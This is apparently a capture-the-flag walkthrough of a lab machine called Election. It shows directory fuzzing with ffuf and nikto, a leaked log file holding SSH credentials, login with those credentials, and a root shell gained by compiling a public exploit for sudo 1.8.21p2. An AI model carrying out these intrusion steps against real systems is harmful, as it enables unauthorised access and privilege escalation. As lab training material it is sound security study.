Election is a simple but effective machine that relies heavily on web enumeration. A leaked log file exposes valid SSH credentials, and privilege escalation is achieved through a vulnerable sudo version (1.8.21p2) that is susceptible to a public exploit. The machine demonstrates how poor log handling and outdated system components can lead to full compromise.
Target: 10.10.10.13 Initial vector: leaked credentials in system.log Privilege escalation: vulnerable sudo version (1.8.21p2) → local root exploit
Directory fuzzing:
$ ffuf -u http://10.10.10.13/FUZZ \ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
Or using Nikto:
$ nikto -url http://10.10.10.13
Findings:
phpinfo.php/election/election/admin$ ffuf -u http://10.10.10.13/election/admin/FUZZ \ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
Nikto reveals:
/election/admin/system.log
Inside system.log:
love : P@$$w0rd@123
Use the leaked credentials:
$ ssh love@10.10.10.13
User shell obtained.
$ sudo -V Version: 1.8.21p2
This version is vulnerable to a known local privilege escalation exploit.
Download or copy the exploit source (commonly referenced in public GitHub repositories), compile it, and run:
$ gcc exploit.c -o exploit $ ./exploit
A root shell is obtained:
# whoami root
Election is a straightforward machine: simple web enumeration reveals a log file containing plaintext credentials, and an outdated sudo version provides an easy privilege escalation path. It reinforces the importance of secure logging practices and timely patching of core system utilities.